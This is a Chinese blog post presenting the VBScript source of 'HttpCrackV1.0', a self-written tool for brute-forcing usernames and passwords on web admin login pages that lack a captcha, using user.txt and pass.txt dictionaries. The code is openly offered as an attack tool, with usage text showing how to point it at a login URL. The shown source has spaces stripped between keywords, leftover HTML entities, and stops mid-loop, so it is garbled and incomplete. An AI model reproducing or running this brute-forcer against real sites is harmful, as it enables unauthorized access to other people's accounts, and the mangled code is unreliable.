HttpCrackV1.0（破解网页后台无验证密码）

自己用vbs写的一个暴力破解后台用户和密码的工具，字典需要自己生成，用户字典保存为user.txt,密码字典保存为pass.txt用法不多说了大家看说明吧。
转载请注明出处啊。o(∩_∩)o...

源码如下：
Dimi,l,u,p,ul,pl

  l=0

  i=0

  u=0

  p=0

Dimurl,user1,pass1,search

Dimuser(),pass()

setarg=wscript.arguments

If(LCase(Right(Wscript.fullname,11))="Wscript.Exe")Then

Wscript.Quit

EndIf

ifarg.count=0orarg.length<>8then

Calluseage()

Wscript.Quit

Else

'-------------------------------功能实现-------------------------------------------------------

Callinit()

CallreadFile()

Callmain()

EndIf

'-------------------------------功能实现-------------------------------------------------------
Submain()

Dimresult

DimpostStr

Fori=0Toul-1

Forl=0Topl-1

&nbsp;&nbsp;postStr=user1&&quot;=&quot;&user(i)&&quot;&&quot;&pass1&&quot;=&quot;&pass(l)

&nbsp;&nbsp;wsh.echo&quot;Checking......&quot;&user(i)&&quot;------&quot;&pass(l)

&nbsp;&nbsp;result=BytesToBstr(GetData(url,postStr),&quot;GB2312&quot;)

&nbsp;&nbsp;'MsgBoxresult

&nbsp;&nbsp;If(InStr(result,search)>0)Then

&nbsp;&nbsp;&nbsp;wsh.echo&quot;&quot;

&nbsp;&nbsp;&nbsp;wsh.echo&quot;GoodJob!!!&quot;&vbcrlf&&quot;YouHaveFoundTheResult&quot;&vbcrlf&&quot;username:&quot;&user(i)&&quot;-------
password:&quot;&pass(l)

&nbsp;&nbsp;&nbsp;wscript.quit

&nbsp;&nbsp;EndIf

next

Next

wsh.echo&quot;SorryIcan'tFindTheResult,PleaseExpandTheDic.&quot;

Endsub

'-------------------------------使用说明-------------------------------------------------------

Subuseage()

wsh.echostring(79,&quot;*&quot;)

wsh.echo&quot;此工具作为暴力破解用户名密码之用，条件是没有认证码做验证&quot;

wsh.echo&quot;&quot;

wsh.echo&quot;HttpCrackV1.0&quot;

wsh.echo&quot;&nbsp;&nbsp;&nbsp;&nbsp;Madeby孤水绕城&quot;

wsh.echo&quot;&nbsp;&nbsp;&nbsp;&nbsp;QQ:540410588Blog:http://hi.baidu.com/540410588&quot;

wsh.echo&quot;&quot;

wsh.echo&quot;Usage:&quot;

wsh.echo&quot;cscript&quot;&wscript.scriptname&&quot;-l(接收用户名密码的url)-u(用户名字段名)-p(密码字段名)-s(返回错误信息关键
字)&quot;

wsh.echo&quot;示例如下：cscript&quot;&wscript.scriptname&&quot;-lhttp://localhost/login.php-uuser-ppass-serror&quot;

wsh.echostring(79,&quot;*&quot;)&vbcrlf

EndSub

'-------------------------------使用说明-------------------------------------------------------

'-------------------------------读取参数-------------------------------------------------------

Subinit()

Dims

s=0

Fors=0To7

&nbsp;&nbsp;If(arg(s)=&quot;-l&quot;)Then

&nbsp;&nbsp;&nbsp;url=arg(s+1)

&nbsp;&nbsp;EndIf

&nbsp;&nbsp;If(arg(s)=&quot;-u&quot;)Then

&nbsp;&nbsp;&nbsp;user1=arg(s+1)

&nbsp;&nbsp;EndIf

&nbsp;&nbsp;If(arg(s)=&quot;-p&quot;)Then

&nbsp;&nbsp;&nbsp;pass1=arg(s+1)

&nbsp;&nbsp;EndIf

&nbsp;&nbsp;If(arg(s)=&quot;-s&quot;)Then

&nbsp;&nbsp;&nbsp;search=arg(s+1)

&nbsp;&nbsp;EndIf

Next

Ifurl<>&quot;&quot;Anduser1<>&quot;&quot;Andpass1<>&quot;&quot;Andsearch<>&quot;&quot;Then

&nbsp;&nbsp;

Else

&nbsp;&nbsp;Calluseage()

&nbsp;&nbsp;wscript.quit

EndIf
EndSub

'------------------------------该部分用于读取user和pass字典----------------------------------

SubreadFile()

Dimpath,length,fullpath,scriptName,str

str=&quot;gsrc&quot;

fullpath=wscript.ScriptFullName

length=InStr(fullpath,scriptName)

path=Mid(fullpath,1,length-1)

Setfso=CreateObject(&quot;Scripting.FileSystemObject&quot;)

Iffso.fileExists(path&&quot;user.txt&quot;)Andfso.fileExists(path&&quot;pass.txt&quot;)Then

&nbsp;&nbsp;Setotfuser=fso.OpenTextFile(path&&quot;user.txt&quot;)

&nbsp;&nbsp;Setotfpass=fso.OpenTextFile(path&&quot;pass.txt&quot;)&nbsp;&nbsp;&nbsp;

&nbsp;&nbsp;DoWhileotfuser.AtEndOfLine<>True&nbsp;&nbsp;

&nbsp;&nbsp;&nbsp;ReDimPreserveuser(i)

&nbsp;&nbsp;&nbsp;str=otfuser.readLine()

&nbsp;&nbsp;&nbsp;str=RegReplace(str,&quot;[\s]+&quot;,&quot;&quot;)'去除多余空格

&nbsp;&nbsp;&nbsp;If(str<>&quot;&quot;)then

&nbsp;&nbsp;&nbsp;&nbsp;user(i)=str

&nbsp;&nbsp;&nbsp;EndIf

&nbsp;&nbsp;&nbsp;i=i+1
*
*